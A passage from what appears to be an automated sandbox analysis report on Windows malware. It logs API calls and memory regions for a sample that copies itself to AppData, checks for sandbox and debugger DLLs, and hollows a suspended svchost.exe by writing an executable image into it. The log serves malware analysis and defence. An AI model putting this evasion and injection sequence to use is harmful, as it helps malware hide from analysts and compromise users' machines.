Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75dd7a10	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75dd435f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75dd1856	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75dd1826	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75dd186e	1	Fn
Module	Unmap	process_name = c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75fe0000	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77720000	1	Fn
Module	Load	module_name = shlwapi.dll, base_address = 0x76f10000	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x77280000	1	Fn
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Module	Get Handle	module_name = cmdvrt32.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = SxIn.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = SbieDll.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = Sf2.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = snxhk.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = dbghelp.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = api_log.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = dir_watch.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = pstorec.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = vmcheck.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = wpespy.dll, base_address = 0x0	1	Fn
System	Get Computer Name	result_out = AUFDDCNTXWT	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\, value_name = ProductName, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\, value_name = ProductName, data = 87	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Filename	module_name = wpespy.dll, process_name = c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe, file_name_orig = C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe, size = 260	1	Fn
File	Create Directory	C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp	1	Fn
File	Copy	source_filename = C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe, destination_filename = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe	1	Fn
System	Sleep	duration = 5000 milliseconds (5.000 seconds)	1	Fn
Process	Create	process_name = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, os_pid = 0xb68, show_window = SW_HIDE	1	Fn

Process #7: mvnucw.exe

(Host: 1105, Network: 0)

Information	Value
ID	#7
File Name	c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe
Command Line	"C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe"
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\
Monitor	Start Time: 00:01:35, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:00:51

OS Process Information

Information	Value
PID	0xb68
Parent PID	0xb18 (c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B6C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x00240fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00256fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00251fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000260000	0x00260000	0x002dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002e0000	0x002e0000	0x0035ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000360000	0x00360000	0x0036ffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll	0x00370000	0x003dafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003f7fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
mvnucw.exe	0x00400000	0x00475fff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x00441fff	Private Memory		Region Actions Download Dump
private_0x0000000000480000	0x00480000	0x0052ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000530000	0x00530000	0x0062ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000630000	0x00630000	0x007b7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007c0000	0x007c0000	0x00940fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000950000	0x00950000	0x01d4ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d50000	0x01d50000	0x01e2efff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01e30000	0x020fefff	Memory Mapped File	Readable	Region Actions
private_0x0000000002100000	0x02100000	0x0222efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000010000000	0x10000000	0x10006fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
dwmapi.dll	0x73600000	0x73612fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73a80000	0x73afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73c40000	0x73c9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73ca0000	0x73cdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x73d10000	0x73d17fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75270000	0x7527bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75280000	0x752dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x752e0000	0x7543bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75440000	0x7552ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x757e0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x75970000	0x75988fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75bc0000	0x75c8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75d10000	0x75dbbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75dc0000	0x75ecffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75fe0000	0x76c29fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76f10000	0x76f66fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76f80000	0x76fdffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76fe0000	0x76fe9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x77130000	0x77175fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x77180000	0x7721cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77280000	0x7731ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000077320000	0x77320000	0x7743efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000077440000	0x77440000	0x77539fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77720000	0x7789ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xb6c

(Host: 1099, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe, base_address = 0x400000	2	Fn
Window	Create	window_name = msPin, class_name = cmsPin, wndproc_parameter = 0	1	Fn
Window	Create	window_name = @, class_name = button, wndproc_parameter = 0	1	Fn
Window	Create	window_name = @, class_name = STATIC, wndproc_parameter = 0	1	Fn
Window	Create	class_name = richedit, wndproc_parameter = 0	1	Fn
Window	Create	class_name = EDIT, wndproc_parameter = 0	1	Fn
Module	Get Handle	module_name = c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe, base_address = 0x400000	1	Fn
File	Create	filename = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp, desired_access = GENERIC_READ	1	Fn
Module	Load	module_name = Kernel32.dll, base_address = 0x75dc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75dd7a10	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75dd435f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75dd1856	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75dd1826	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75dd186e	1	Fn
Module	Unmap	process_name = c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75fe0000	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77720000	1	Fn
Module	Load	module_name = shlwapi.dll, base_address = 0x76f10000	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x77280000	1	Fn
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Module	Get Handle	module_name = cmdvrt32.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = SxIn.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = SbieDll.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = Sf2.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = snxhk.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = dbghelp.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = api_log.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = dir_watch.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = pstorec.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = vmcheck.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = wpespy.dll, base_address = 0x0	1	Fn
System	Get Computer Name	result_out = AUFDDCNTXWT	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\, value_name = ProductName, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\, value_name = ProductName, data = 87	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Filename	module_name = wpespy.dll, process_name = c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 260	1	Fn
Process	Create	process_name = svchost.exe, os_pid = 0x830, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0xc0000018	1	Fn
Module	Load	module_name = kernelbase.dll, base_address = 0x0	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18ce98, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625672	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x50000, size = 544	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18ce98, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625672	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x7fffffd6000, size = 712	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0xff5a0000, size = 64	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0xff5a00e8, size = 264	1	Fn Data
Memory	Protect	process_name = svchost.exe, address = 0xff5a246c, protection = PAGE_EXECUTE_READWRITE, size = 1625752	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xff5a246c, size = 22	1	Fn Data
Thread	Resume	process_name = c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe, os_tid = 0xb6c	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cde0, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625672	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cd70, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625592	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140000000, size = 1024	1	Fn Data
Memory	Protect	process_name = svchost.exe, address = 0x140000000, protection = PAGE_READONLY, size = 1625576	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140001000, size = 96768	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019000, size = 25088	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140020000, size = 2264	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x140020000, size = 512	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140021000, size = 6144	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140023000, size = 1536	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140024000, size = 1536	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 21	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20025, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 7	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20017, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019190, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 9	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20019, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019198, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 18	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20022, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191a0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 17	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20021, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191a8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 7	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20017, size = 8	1	Fn Data
